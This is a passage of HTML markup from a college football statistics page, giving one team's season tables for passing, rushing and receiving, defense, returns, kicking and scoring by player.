<td align="right" >+36.9</td>
<td align="right" >-0.2</td>
<td align="right" >-0.4</td>
<td align="right" >-0.6</td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Passing</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_passing">
<table class="sortable stats_table" id="passing">
<colgroup><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=9 class="bold_text over_header" >Passing</th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Pass Completions">Cmp</th>
<th align="right" class="tooltip" tip="Pass Attempts">Att</th>
<th align="right" class="tooltip" tip="Pass Completion Percentage">Pct</th>
<th align="right" class="tooltip" tip="Passing Yards">Yds</th>
<th align="right" class="tooltip" tip="Passing Yards Per Attempt">Y/A</th>
<th align="right" class="tooltip" tip="Adjusted Passing Yards Per Attempt; the formula is (Yds + 20 * TD - 45 * Int) / Att">AY/A</th>
<th align="right" class="tooltip" tip="Passing Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Passing Interceptions">Int</th>
<th align="right" class="tooltip" tip="Passing Efficiency Rating; the formula is (8.4 * Yds + 330 * TD - 200 * Int + 100 * Cmp) / Att">Rate</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Anderson,Derek"><a href="/cfb/players/derek-anderson-1.html">Derek Anderson</a></td>
<td align="right" >211</td>
<td align="right" >449</td>
<td align="right" >47.0</td>
<td align="right" >3313</td>
<td align="right" >7.4</td>
<td align="right" >7.2</td>
<td align="right" >25</td>
<td align="right" >13</td>
<td align="right" >121.6</td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Rothenfluh,Adam"><a href="/cfb/players/adam-rothenfluh-1.html">Adam Rothenfluh</a></td>
<td align="right" >10</td>
<td align="right" >18</td>
<td align="right" >55.6</td>
<td align="right" >101</td>
<td align="right" >5.6</td>
<td align="right" >4.2</td>
<td align="right" >1</td>
<td align="right" >1</td>
<td align="right" >109.9</td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Rushing & Receiving</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_rushing_and_receiving">
<table class="sortable stats_table" id="rushing_and_receiving">
<colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=4 class="bold_text over_header" >Rushing</th>
<th align="center" colspan=4 class="bold_text over_header" >Receiving</th>
<th align="center" colspan=4 class="bold_text over_header" >Scrimmage</th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Rush Attempts">Att</th>
<th align="right" class="tooltip" tip="Rushing Yards">Yds</th>
<th align="right" class="tooltip" tip="Rushing Yards Per Attempt">Avg</th>
<th align="right" class="tooltip" tip="Rushing Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Receptions">Rec</th>
<th align="right" class="tooltip" tip="Receiving Yards">Yds</th>
<th align="right" class="tooltip" tip="Receiving Yards Per Reception">Avg</th>
<th align="right" class="tooltip" tip="Receiving Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Plays From Scrimmage (Rush Attempts plus Receptions)">Plays</th>
<th align="right" class="tooltip" tip="Yards From Scrimmage (Rushing Yards plus Receiving Yards)">Yds</th>
<th align="right" class="tooltip" tip="Yards From Scrimmage Per Play">Avg</th>
<th align="right" class="tooltip" tip="Touchdowns From Scrimmage (Rushing Touchdowns plus Receiving Touchdowns)">TD</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Jackson,Steven"><a href="/cfb/players/steven-jackson-3.html">Steven Jackson</a></td>
<td align="right" >319</td>
<td align="right" >1690</td>
<td align="right" >5.3</td>
<td align="right" >15</td>
<td align="right" >17</td>
<td align="right" >165</td>
<td align="right" >9.7</td>
<td align="right" >2</td>
<td align="right" >336</td>
<td align="right" >1855</td>
<td align="right" >5.5</td>
<td align="right" >17</td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Wright,Dwight"><a href="/cfb/players/dwight-wright-1.html">Dwight Wright</a></td>
<td align="right" >84</td>
<td align="right" >383</td>
<td align="right" >4.6</td>
<td align="right" >4</td>
<td align="right" >1</td>
<td align="right" >1</td>
<td align="right" >1.0</td>
<td align="right" >0</td>
<td align="right" >85</td>
<td align="right" >384</td>
<td align="right" >4.5</td>
<td align="right" >4</td>
</tr>
<tr class="">
<td align="right" csk="3">3</td>
<td align="left" csk="Anderson,Derek"><a href="/cfb/players/derek-anderson-1.html">Derek Anderson</a></td>
<td align="right" >45</td>
<td align="right" >-231</td>
<td align="right" >-5.1</td>
<td align="right" >2</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >45</td>
<td align="right" >-231</td>
<td align="right" >-5.1</td>
<td align="right" >2</td>
</tr>
<tr class="">
<td align="right" csk="4">4</td>
<td align="left" csk="Farrell,Josh"><a href="/cfb/players/josh-farrell-1.html">Josh Farrell</a></td>
<td align="right" >21</td>
<td align="right" >59</td>
<td align="right" >2.8</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >21</td>
<td align="right" >59</td>
<td align="right" >2.8</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="5">5</td>
<td align="left" csk="Rothenfluh,Adam"><a href="/cfb/players/adam-rothenfluh-1.html">Adam Rothenfluh</a></td>
<td align="right" >9</td>
<td align="right" >-27</td>
<td align="right" >-3.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >9</td>
<td align="right" >-27</td>
<td align="right" >-3.0</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="6">6</td>
<td align="left" csk="Landingham,Rodney"><a href="/cfb/players/rodney-landingham-1.html">Rodney Landingham</a></td>
<td align="right" >6</td>
<td align="right" >24</td>
<td align="right" >4.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
<td align="right" >24</td>
<td align="right" >4.0</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="7">7</td>
<td align="left" csk="Jenkins,Riley"><a href="/cfb/players/riley-jenkins-1.html">Riley Jenkins</a></td>
<td align="right" >6</td>
<td align="right" >15</td>
<td align="right" >2.5</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >6</td>
<td align="right" >15</td>
<td align="right" >2.5</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="8">8</td>
<td align="left" csk="Boyd,Jayson"><a href="/cfb/players/jayson-boyd-1.html">Jayson Boyd</a></td>
<td align="right" >3</td>
<td align="right" >11</td>
<td align="right" >3.7</td>
<td align="right" >0</td>
<td align="right" >10</td>
<td align="right" >169</td>
<td align="right" >16.9</td>
<td align="right" >1</td>
<td align="right" >13</td>
<td align="right" >180</td>
<td align="right" >13.8</td>
<td align="right" >1</td>
</tr>
<tr class="">
<td align="right" csk="9">9</td>
<td align="left" csk="Clasen,Cole"><a href="/cfb/players/cole-clasen-1.html">Cole Clasen</a></td>
<td align="right" >2</td>
<td align="right" >6</td>
<td align="right" >3.0</td>
<td align="right" >0</td>
<td align="right" >23</td>
<td align="right" >273</td>
<td align="right" >11.9</td>
<td align="right" >1</td>
<td align="right" >25</td>
<td align="right" >279</td>
<td align="right" >11.2</td>
<td align="right" >1</td>
</tr>
<tr class="">
<td align="right" csk="10">10</td>
<td align="left" csk="Newson,James"><a href="/cfb/players/james-newson-1.html">James Newson</a></td>
<td align="right" >1</td>
<td align="right" >22</td>
<td align="right" >22.0</td>
<td align="right" >0</td>
<td align="right" >74</td>
<td align="right" >1284</td>
<td align="right" >17.4</td>
<td align="right" >12</td>
<td align="right" >75</td>
<td align="right" >1306</td>
<td align="right" >17.4</td>
<td align="right" >12</td>
</tr>
<tr class="">
<td align="right" csk="11">11</td>
<td align="left" csk="Farley,Kenny"><a href="/cfb/players/kenny-farley-1.html">Kenny Farley</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >29</td>
<td align="right" >526</td>
<td align="right" >18.1</td>
<td align="right" >3</td>
<td align="right" >29</td>
<td align="right" >526</td>
<td align="right" >18.1</td>
<td align="right" >3</td>
</tr>
<tr class="">
<td align="right" csk="12">12</td>
<td align="left" csk="Euhus,Tim"><a href="/cfb/players/tim-euhus-1.html">Tim Euhus</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >22</td>
<td align="right" >385</td>
<td align="right" >17.5</td>
<td align="right" >1</td>
<td align="right" >22</td>
<td align="right" >385</td>
<td align="right" >17.5</td>
<td align="right" >1</td>
</tr>
<tr class="">
<td align="right" csk="13">13</td>
<td align="left" csk="Kintner,Shawn"><a href="/cfb/players/shawn-kintner-1.html">Shawn Kintner</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >17</td>
<td align="right" >258</td>
<td align="right" >15.2</td>
<td align="right" >4</td>
<td align="right" >17</td>
<td align="right" >258</td>
<td align="right" >15.2</td>
<td align="right" >4</td>
</tr>
<tr class="">
<td align="right" csk="14">14</td>
<td align="left" csk="Haines,Dan"><a href="/cfb/players/dan-haines-1.html">Dan Haines</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >10</td>
<td align="right" >144</td>
<td align="right" >14.4</td>
<td align="right" >1</td>
<td align="right" >10</td>
<td align="right" >144</td>
<td align="right" >14.4</td>
<td align="right" >1</td>
</tr>
<tr class="">
<td align="right" csk="15">15</td>
<td align="left" csk="Gillett,George"><a href="/cfb/players/george-gillett-1.html">George Gillett</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >7</td>
<td align="right" >140</td>
<td align="right" >20.0</td>
<td align="right" >0</td>
<td align="right" >7</td>
<td align="right" >140</td>
<td align="right" >20.0</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="16">16</td>
<td align="left" csk="Alexander,Deondre"><a href="/cfb/players/deondre-alexander-1.html">Deondre Alexander</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >4</td>
<td align="right" >29</td>
<td align="right" >7.3</td>
<td align="right" >0</td>
<td align="right" >4</td>
<td align="right" >29</td>
<td align="right" >7.3</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="17">17</td>
<td align="left" csk="Trimmer,Seth"><a href="/cfb/players/seth-trimmer-1.html">Seth Trimmer</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >3</td>
<td align="right" >17</td>
<td align="right" >5.7</td>
<td align="right" >0</td>
<td align="right" >3</td>
<td align="right" >17</td>
<td align="right" >5.7</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="18">18</td>
<td align="left" csk="Jackson,Jermaine"><a href="/cfb/players/jermaine-jackson-1.html">Jermaine Jackson</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >2</td>
<td align="right" >8</td>
<td align="right" >4.0</td>
<td align="right" >1</td>
<td align="right" >2</td>
<td align="right" >8</td>
<td align="right" >4.0</td>
<td align="right" >1</td>
</tr>
<tr class="">
<td align="right" csk="19">19</td>
<td align="left" csk="Brentano,Nate"><a href="/cfb/players/nate-brentano-1.html">Nate Brentano</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >9</td>
<td align="right" >9.0</td>
<td align="right" >0</td>
<td align="right" >1</td>
<td align="right" >9</td>
<td align="right" >9.0</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="20">20</td>
<td align="left" csk="Ross,Tyler"><a href="/cfb/players/tyler-ross-1.html">Tyler Ross</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >6</td>
<td align="right" >6.0</td>
<td align="right" >0</td>
<td align="right" >1</td>
<td align="right" >6</td>
<td align="right" >6.0</td>
<td align="right" >0</td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Defense & Fumbles</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_defense_and_fumbles">
<table class="sortable stats_table" id="defense_and_fumbles">
<colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=5 class="bold_text over_header" >Tackles</th>
<th align="center" colspan=5 class="bold_text over_header" >Def Int</th>
<th align="center" colspan=4 class="bold_text over_header" >Fumbles</th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Solo Tackles">Solo</th>
<th align="right" class="tooltip" tip="Assisted Tackles">Ast</th>
<th align="right" class="tooltip" tip="Total Tackles">Tot</th>
<th align="right" class="tooltip" tip="Tackles for Loss">Loss</th>
<th align="right" class="tooltip" tip="Sacks">Sk</th>
<th align="right" class="tooltip" tip="Interceptions">Int</th>
<th align="right" class="tooltip" tip="Interception Return Yards">Yds</th>
<th align="right" class="tooltip" tip="Interception Return Yards Per Interception">Avg</th>
<th align="right" class="tooltip" tip="Interception Return Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Passes Defended">PD</th>
<th align="right" class="tooltip" tip="Fumbles Recovered">FR</th>
<th align="right" class="tooltip" tip="Fumble Recovery Return Yards">Yds</th>
<th align="right" class="tooltip" tip="Fumble Recovery Return Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Fumbles Forced">FF</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Meeuwsen,Mitch"><a href="/cfb/players/mitch-meeuwsen-1.html">Mitch Meeuwsen</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >5</td>
<td align="right" >26</td>
<td align="right" >5.2</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Turner,Lawrence"><a href="/cfb/players/lawrence-turner-1.html">Lawrence Turner</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >4</td>
<td align="right" >40</td>
<td align="right" >10.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="3">3</td>
<td align="left" csk="Seigler,Richard"><a href="/cfb/players/richard-seigler-1.html">Richard Seigler</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >3</td>
<td align="right" >102</td>
<td align="right" >34.0</td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="4">4</td>
<td align="left" csk="Carlyle,Calvin"><a href="/cfb/players/calvin-carlyle-1.html">Calvin Carlyle</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >2</td>
<td align="right" >33</td>
<td align="right" >16.5</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="5">5</td>
<td align="left" csk="Roberts,Terrell"><a href="/cfb/players/terrell-roberts-1.html">Terrell Roberts</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >2</td>
<td align="right" >5</td>
<td align="right" >2.5</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="6">6</td>
<td align="left" csk="Happe,Noah"><a href="/cfb/players/noah-happe-1.html">Noah Happe</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >52</td>
<td align="right" >52.0</td>
<td align="right" >1</td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >19</td>
<td align="right" >1</td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="7">7</td>
<td align="left" csk="Bray,Trent"><a href="/cfb/players/trent-bray-1.html">Trent Bray</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >0</td>
<td align="right" >0.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="8">8</td>
<td align="left" csk="Tuma,Erik"><a href="/cfb/players/erik-tuma-1.html">Erik Tuma</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >4</td>
<td align="right" >4.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="9">9</td>
<td align="left" csk="Weathersby,Dennis"><a href="/cfb/players/dennis-weathersby-1.html">Dennis Weathersby</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >0</td>
<td align="right" >0.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="10">10</td>
<td align="left" csk="Trimmer,Seth"><a href="/cfb/players/seth-trimmer-1.html">Seth Trimmer</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >0</td>
<td align="right" >0</td>
<td align="right" ></td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Kick & Punt Returns</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_returns">
<table class="sortable stats_table" id="returns">
<colgroup><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=4 class="bold_text over_header" >Kick Ret</th>
<th align="center" colspan=4 class="bold_text over_header" >Punt Ret</th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Kickoff Returns">Ret</th>
<th align="right" class="tooltip" tip="Kickoff Return Yards">Yds</th>
<th align="right" class="tooltip" tip="Kickoff Return Yards Per Return">Avg</th>
<th align="right" class="tooltip" tip="Kickoff Return Touchdowns">TD</th>
<th align="right" class="tooltip" tip="Punt Returns">Ret</th>
<th align="right" class="tooltip" tip="Punt Return Yards">Yds</th>
<th align="right" class="tooltip" tip="Punt Return Yards Per Return">Avg</th>
<th align="right" class="tooltip" tip="Punt Return Touchdowns">TD</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Catenese,Brandon"><a href="/cfb/players/brandon-catenese-1.html">Brandon Catenese</a></td>
<td align="right" >9</td>
<td align="right" >214</td>
<td align="right" >23.8</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Roberts,Terrell"><a href="/cfb/players/terrell-roberts-1.html">Terrell Roberts</a></td>
<td align="right" >9</td>
<td align="right" >205</td>
<td align="right" >22.8</td>
<td align="right" >0</td>
<td align="right" >18</td>
<td align="right" >174</td>
<td align="right" >9.7</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="3">3</td>
<td align="left" csk="Williams,Aric"><a href="/cfb/players/aric-williams-1.html">Aric Williams</a></td>
<td align="right" >7</td>
<td align="right" >127</td>
<td align="right" >18.1</td>
<td align="right" >0</td>
<td align="right" >24</td>
<td align="right" >183</td>
<td align="right" >7.6</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="4">4</td>
<td align="left" csk="Wright,Dwight"><a href="/cfb/players/dwight-wright-1.html">Dwight Wright</a></td>
<td align="right" >5</td>
<td align="right" >91</td>
<td align="right" >18.2</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="5">5</td>
<td align="left" csk="Carlyle,Calvin"><a href="/cfb/players/calvin-carlyle-1.html">Calvin Carlyle</a></td>
<td align="right" >4</td>
<td align="right" >109</td>
<td align="right" >27.3</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="6">6</td>
<td align="left" csk="Landingham,Rodney"><a href="/cfb/players/rodney-landingham-1.html">Rodney Landingham</a></td>
<td align="right" >2</td>
<td align="right" >62</td>
<td align="right" >31.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="7">7</td>
<td align="left" csk="Alexander,Deondre"><a href="/cfb/players/deondre-alexander-1.html">Deondre Alexander</a></td>
<td align="right" >1</td>
<td align="right" >23</td>
<td align="right" >23.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="8">8</td>
<td align="left" csk="Swancutt,Bill"><a href="/cfb/players/bill-swancutt-1.html">Bill Swancutt</a></td>
<td align="right" >1</td>
<td align="right" >12</td>
<td align="right" >12.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="9">9</td>
<td align="left" csk="Turner,Lawrence"><a href="/cfb/players/lawrence-turner-1.html">Lawrence Turner</a></td>
<td align="right" >1</td>
<td align="right" >12</td>
<td align="right" >12.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="10">10</td>
<td align="left" csk="Kanekeberg,Ryan"><a href="/cfb/players/ryan-kanekeberg-1.html">Ryan Kanekeberg</a></td>
<td align="right" >1</td>
<td align="right" >11</td>
<td align="right" >11.0</td>
<td align="right" >0</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="11">11</td>
<td align="left" csk="Newson,James"><a href="/cfb/players/james-newson-1.html">James Newson</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >7</td>
<td align="right" >52</td>
<td align="right" >7.4</td>
<td align="right" >0</td>
</tr>
<tr class="">
<td align="right" csk="12">12</td>
<td align="left" csk="Jackson,Jamaal"><a href="/cfb/players/jamaal-jackson-3.html">Jamaal Jackson</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >1</td>
<td align="right" >1</td>
<td align="right" >1.0</td>
<td align="right" >0</td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Kicking & Punting</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_kicking_and_punting">
<table class="sortable stats_table" id="kicking_and_punting">
<colgroup><col><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=7 class="bold_text over_header" >Kicking</th>
<th align="center" colspan=3 class="bold_text over_header" >Punting</th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Extra Points Made">XPM</th>
<th align="right" class="tooltip" tip="Extra Point Attempts">XPA</th>
<th align="right" class="tooltip" tip="Extra Point Percentage">XP%</th>
<th align="right" class="tooltip" tip="Field Goals Made">FGM</th>
<th align="right" class="tooltip" tip="Field Goal Attempts">FGA</th>
<th align="right" class="tooltip" tip="Field Goal Percentage">FG%</th>
<th align="right" class="tooltip" tip="Points Kicking">Pts</th>
<th align="right" class="tooltip" tip="Punts">Punts</th>
<th align="right" class="tooltip" tip="Punting Yards">Yds</th>
<th align="right" class="tooltip" tip="Punting Yards Per Punt">Avg</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Yliniemi,Kirk"><a href="/cfb/players/kirk-yliniemi-1.html">Kirk Yliniemi</a></td>
<td align="right" >45</td>
<td align="right" >46</td>
<td align="right" >97.8</td>
<td align="right" >15</td>
<td align="right" >16</td>
<td align="right" >93.8</td>
<td align="right" >90</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Cesca,Ryan"><a href="/cfb/players/ryan-cesca-1.html">Ryan Cesca</a></td>
<td align="right" >5</td>
<td align="right" >5</td>
<td align="right" >100.0</td>
<td align="right" >1</td>
<td align="right" >4</td>
<td align="right" >25.0</td>
<td align="right" >8</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
</tr>
<tr class="">
<td align="right" csk="3">3</td>
<td align="left" csk="Tobey,Carl"><a href="/cfb/players/carl-tobey-1.html">Carl Tobey</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >74</td>
<td align="right" >2981</td>
<td align="right" >40.3</td>
</tr>
</tbody>
</table>
</div>
<div class="table_heading">
<h2 style="">Scoring</h2>
<div class="table_heading_text"></div>
</div>
<div class="table_container" id="div_scoring">
<table class="sortable stats_table" id="scoring">
<colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th align="center" colspan=8 class="bold_text over_header" >Touchdowns</th>
<th align="center" colspan=2 class="bold_text over_header" >Kicking</th>
<th align="CENTER" colspan=2 class="tooltip over_header" ></th>
<th></th>
</tr>
<tr class="">
<th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th>
<th align="left" class="tooltip sort_default_asc" >Player</th>
<th align="right" class="tooltip" tip="Rushing Touchdowns">Rush</th>
<th align="right" class="tooltip" tip="Receiving Touchdowns">Rec</th>
<th align="right" class="tooltip" tip="Interception Return Touchdowns">Int</th>
<th align="right" class="tooltip" tip="Fumble Recovery Return Touchdowns">FR</th>
<th align="right" class="tooltip" tip="Punt Return Touchdowns">PR</th>
<th align="right" class="tooltip" tip="Kick Return Touchdowns">KR</th>
<th align="right" class="tooltip" tip="Other Touchdowns">Oth</th>
<th align="right" class="tooltip" tip="Total Touchdowns">Tot</th>
<th align="right" class="tooltip" tip="Extra Points Made">XPM</th>
<th align="right" class="tooltip" tip="Field Goals Made">FGM</th>
<th align="right" class="tooltip" tip="Two-Point Conversions Made">2PM</th>
<th align="right" class="tooltip" tip="Safeties">Sfty</th>
<th align="right" class="tooltip" tip="Points">Pts</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="right" csk="1">1</td>
<td align="left" csk="Jackson,Steven"><a href="/cfb/players/steven-jackson-3.html">Steven Jackson</a></td>
<td align="right" >15</td>
<td align="right" >2</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >17</td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" >102</td>
</tr>
<tr class="">
<td align="right" csk="2">2</td>
<td align="left" csk="Yliniemi,Kirk"><a href="/cfb/players/kirk-yliniemi-1.html">Kirk Yliniemi</a></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
<td align="right" ></td>
